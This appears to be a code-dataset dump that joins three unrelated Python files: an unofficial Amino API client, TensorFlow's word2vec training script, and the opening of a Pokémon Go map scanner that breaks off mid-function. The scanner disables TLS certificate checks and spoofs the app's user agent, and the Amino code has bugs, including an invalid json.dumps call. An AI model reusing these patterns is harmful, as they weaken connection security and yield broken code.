async with self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
async def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: url = f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}"
elif blogId: url = f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def like_blog(self, blogId: Union[str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
async def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: url = f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.SpecifyType()
async def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: url = f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView"
elif blogId: url = f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView"
else: raise exceptions.SpecifyType()
async with self.session.delete(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Membership(json.loads(await response.text())).Membership
async def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
async with self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.BlogList(json.loads(await response.text())["blogList"]).BlogList
async def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.WalletInfo(json.loads(await response.text())["wallet"]).WalletInfo
async def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.WalletHistory(json.loads(await response.text())["coinHistoryList"]).WalletHistory
async def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from an Device ID.
**Parameters**
- **deviceID** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["auid"]
async def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.FromCode(json.loads(await response.text())["linkInfoV2"]).FromCode
async def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: url = f"{self.api}/g/s-x{comId}/link-resolution"
else: url = f"{self.api}/g/s/link-resolution"
async with self.session.post(url, headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.FromCode(json.loads(await response.text())["linkInfoV2"]).FromCode
async def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["supportedLanguages"]
async def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["storeSubscriptionItemList"]
async def get_all_users(self, start: int = 0, size: int = 25):
"""
Get list of users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileCountList(json.loads(await response.text())).UserProfileCountList
async def accept_host(self, chatId: str, requestId: str):
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def accept_organizer(self, chatId: str, requestId: str):
await self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
async def link_identify(self, code: str):
async with self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())
async def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def wallet_config(self, level: int):
"""
Changes ads config
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_avatar_frames(self, start: int = 0, size: int = 25):
async with self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.AvatarFrameList(json.loads(await response.text())["avatarFrameList"]).AvatarFrameList
async def subscribe_amino_plus(self, transactionId="", sku="d940cf4a-6cf2-4737-9f3d-655234a92ea5"):
"""
Subscibes to amino+
**Parameters**
- **transactionId** - The transaction Id as a uuid4
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
{
"sku": sku,
"packageName": "com.narvii.amino.master",
"paymentType": 1,
"paymentContext": {
"transactionId": (transactionId or str(uuid4())),
"isAutoRenew": True
},
"timestamp": timestamp()
}
})
async with self.session.post(f"{self.api}/g/s/membership/product/subscribe", headers=self.parse_headers(), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
|
word2vec_optimized.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write("%s %d\n" % (tf.compat.as_text(opts.vocab_words[i]),
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time = initial_words, time.time()
while True:
time.sleep(5) # Reports our progress once a while.
(epoch, step, words,
lr) = self._session.run([self._epoch, self.step, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f words/sec = %8.0f\r" % (epoch, step,
lr, rate),
end="")
sys.stdout.flush()
if epoch != initial_epoch:
break
for t in workers:
t.join()
def _predict(self, analogy):
"""Predict the top 4 answers for analogy questions."""
idx, = self._session.run([self._analogy_pred_idx], {
self._analogy_a: analogy[:, 0],
self._analogy_b: analogy[:, 1],
self._analogy_c: analogy[:, 2]
})
return idx
def eval(self):
"""Evaluate analogy questions and reports accuracy."""
# How many questions we get right at precision@1.
correct = 0
total = self._analogy_questions.shape[0]
start = 0
while start < total:
limit = start + 2500
sub = self._analogy_questions[start:limit, :]
idx = self._predict(sub)
start = limit
for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session, os.path.join(opts.save_path, "model.ckpt"),
global_step=model.step)
if FLAGS.interactive:
# E.g.,
# [0]: model.Analogy('france', 'paris', 'russia')
# [1]: model.Nearby(['proton', 'elephant', 'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
example.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
# stuff for in-background search thread
search_thread = None
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
key = str(args) + str(kwargs)
if key not in cache:
cache[key] = obj(*args, **kwargs)
return cache[key]
return memoizer
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
